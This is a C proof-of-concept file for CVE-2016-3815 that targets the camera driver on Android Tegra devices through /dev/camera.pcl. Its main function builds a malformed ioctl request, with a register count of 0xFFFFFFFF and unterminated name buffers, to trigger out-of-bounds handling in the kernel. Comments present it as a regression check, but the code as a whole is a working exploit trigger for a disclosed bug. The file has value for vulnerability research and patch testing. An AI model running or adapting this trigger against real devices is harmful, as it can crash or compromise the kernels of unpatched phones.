/*** CVE-2016-3815.c
*
* https://code.google.com/p/android/issues/detail?id=208804
* https://android.googlesource.com/kernel/tegra.git/+/android-tegra-flounder-3.10-n-preview-2/drivers/media/platform/tegra/cam_dev/virtual.c#433
*
*
*/
#include <errno.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>

#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
/*
 * Userspace spellings of the kernel's fixed-width type names, so the
 * request structure below can be written with the same member types.
 */
typedef unsigned char __u8;
typedef uint32_t __u32;

/* Device node that receives the ioctl request. */
const char *dev = "/dev/camera.pcl";

/* Size limits used to dimension the request structure. */
#define CAMERA_MAX_NAME_LENGTH      32
#define VIRTUAL_DEV_MAX_REGULATORS  8
#define VIRTUAL_DEV_MAX_GPIOS       8
#define VIRTUAL_DEV_MAX_POWER_SIZE  32

/* Room for VIRTUAL_DEV_MAX_REGULATORS names of CAMERA_MAX_NAME_LENGTH bytes: 8 * 32 = 256. */
#define VIRTUAL_REGNAME_SIZE \
    (VIRTUAL_DEV_MAX_REGULATORS * CAMERA_MAX_NAME_LENGTH)
/* Bus types accepted in virtual_device.bus_type; I2C is the only one listed. */
enum {
    CAMERA_DEVICE_TYPE_I2C = 0,
    CAMERA_DEVICE_TYPE_MAX_NUM = 1,
};

/* Values for regmap_cfg.cache_type. */
enum regcache_type {
    REGCACHE_NONE = 0,
    REGCACHE_RBTREE = 1,
    REGCACHE_COMPRESSED = 2,
    REGCACHE_FLAT = 3,
};
/* Register-map settings embedded in the request. */
struct regmap_cfg {
    int addr_bits;
    int val_bits;
    __u32 cache_type;   /* one of enum regcache_type */
};

/*
 * Request body handed to PCLLK_IOCTL_CHIP_REG.
 *
 * The members `void *power_on` and `void *power_off` are commented out in
 * this copy; the two 32-bit fields k and w sit in their place.
 * NOTE(review): presumably this mirrors the driver's layout for a 32-bit
 * caller - confirm against the kernel header before relying on it.
 *
 * name and reg_names are fixed-size byte arrays; nothing in the layout
 * guarantees a terminating NUL, so a consumer has to bound every read.
 */
struct virtual_device {
    uint32_t k;
    uint32_t w;
    struct regmap_cfg regmap_cfg;
    __u32 bus_type;
    __u32 gpio_num;
    __u32 reg_num;      /* caller-supplied count of entries in reg_names */
    __u32 pwr_on_size;
    __u32 pwr_off_size;
    __u32 clk_num;
    __u8 name[32];
    __u8 reg_names[VIRTUAL_REGNAME_SIZE];
};

/*
 * _IOW encodes sizeof(struct virtual_device) in the request number, so any
 * change to the layout above also changes the ioctl number.
 */
#define PCLLK_IOCTL_CHIP_REG _IOW('o', 100, struct virtual_device)
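/*
 * Sends a single PCLLK_IOCTL_CHIP_REG request to the camera device node and
 * reports whether the kernel accepted it.
 *
 * The request is deliberately malformed: reg_num is 0xFFFFFFFF although
 * reg_names only has room for VIRTUAL_DEV_MAX_REGULATORS names, and both
 * name and reg_names are filled with bytes that contain no NUL. That makes
 * the program usable as a regression check for the driver code linked in
 * the file header.
 *
 * NOTE(review): the ioctl handler is not part of this file. Presumably it
 * consumed reg_num and the name buffers without bounding them - confirm
 * against the linked virtual.c. A corrected handler is expected to reject
 * reg_num values above VIRTUAL_DEV_MAX_REGULATORS and to treat both name
 * buffers as fixed-length data that may lack a terminator.
 *
 * Returns EXIT_FAILURE on every path, exactly as the original did; the
 * result of the ioctl is printed on stdout instead.
 */
int main(void)
{
    struct virtual_device vdev = { 0 };
    int fd;
    int rc;
    int saved_errno;

    fd = open(dev, O_RDWR);
    if (fd < 0) {
        printf("Failed to open %s with errno as %s\n",
               dev, strerror(errno));
        return EXIT_FAILURE;
    }

    vdev.k = 1;
    vdev.w = 1;
    /*
     * The power_on/power_off buffers of the original layout are not sent:
     * those members are commented out in struct virtual_device.
     */

    memset(vdev.name, 'A', sizeof vdev.name);
    /*
     * name has no terminator, so print it with an explicit length rather
     * than "%s", which would read past the end of the array.
     */
    printf("%.*s\n", (int)sizeof vdev.name, (const char *)vdev.name);

    memset(vdev.reg_names, 'A', sizeof vdev.reg_names);
    vdev.reg_num = 0xFFFFFFFF;  /* far beyond VIRTUAL_DEV_MAX_REGULATORS */

    vdev.bus_type = CAMERA_DEVICE_TYPE_I2C;
    vdev.regmap_cfg.addr_bits = 16;
    vdev.regmap_cfg.val_bits = 8;
    vdev.regmap_cfg.cache_type = REGCACHE_NONE;

    vdev.gpio_num = 1;
    vdev.pwr_on_size = 1;
    /*
     * Original author's note: "prevent null termination".
     * NOTE(review): why this field has that effect is not evident from
     * this file - confirm against the driver.
     */
    vdev.pwr_off_size = 1;

    rc = ioctl(fd, PCLLK_IOCTL_CHIP_REG, &vdev);
    saved_errno = errno;    /* printf below may overwrite errno */
    if (rc < 0)
        printf("ioctl rejected the request: %s\n", strerror(saved_errno));
    else
        printf("ioctl accepted the request (returned %d)\n", rc);

    close(fd);
    return EXIT_FAILURE;
}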